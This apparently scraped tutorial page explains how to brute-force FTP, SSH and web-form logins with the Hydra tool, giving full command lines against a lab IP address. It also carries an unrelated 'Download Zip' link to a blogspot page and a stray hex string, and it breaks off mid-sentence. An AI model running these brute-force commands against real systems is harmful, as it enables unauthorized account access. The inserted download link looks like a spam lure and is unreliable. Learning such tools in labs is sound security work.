How to Use Hydra to Crack Passwords with a Passlist
Hydra is a powerful tool that can brute force passwords for various services and protocols. It can use a list of passwords, also known as a passlist, to try different combinations until it finds the correct one. In this article, we will show you how to use Hydra with a passlist to crack passwords for SSH and web forms.
What is Hydra?
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. It supports: Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP (S)-FORM-GET, HTTP (S)-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB (NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP[^1^].
How to Install Hydra?
If you're using Kali Linux, hydra is pre-installed. Otherwise you can download it here: https://github.com/vanhauser-thc/thc-hydra. If you don't have Linux or the right desktop environment, you can deploy your own Kali Linux machine with all the needed security tools. You can even control the machine in your browser! Do this with our Kali room - https://tryhackme.com/room/kali[^2^].
Passlist Txt Hydra
Download Zip: https://conttooperting.blogspot.com/?l=2tGV16
How to Use Hydra with a Passlist?
The options we pass into Hydra depends on which service (protocol) we're attacking. For example if we wanted to bruteforce FTP with the username being user and a password list being passlist.txt on the machine 10.10.139.250 , we'd use the following command:
hydra -l user -P passlist.txt ftp://10.10.139.250
For the purpose of this article, here are the commands to use Hydra on SSH and a web form (POST method) on the same machine:
SSH
hydra -l <username> -P <passlist> 10.10.139.250 -t 4 ssh
-l: username
-P: password list
-t: number of threads
ssh: service/protocol
Web Form (POST method)
hydra -l <username> -P <passlist> 10.10.139.250 http-post-form \"/:username=^USER^&password=^PASS^:F=incorrect\" -V
-l: username
-P: password list
http-post-form: service/protocol
\"/:username=^USER^&password=^PASS^:F=incorrect\": web form parameters
The first part is the page where the form is located (/)
The second part is the parameters that are being sent (username and password)
The third part is the failure condition (F=incorrect), which means that if the response contains the word \"incorrect\", then the password is wrong
-V: verbose mode
Where to Find a Passlist?
A passlist is a file that contains a list of common or weak passwords that are likely to be used by users. You can find 0efd9a6b88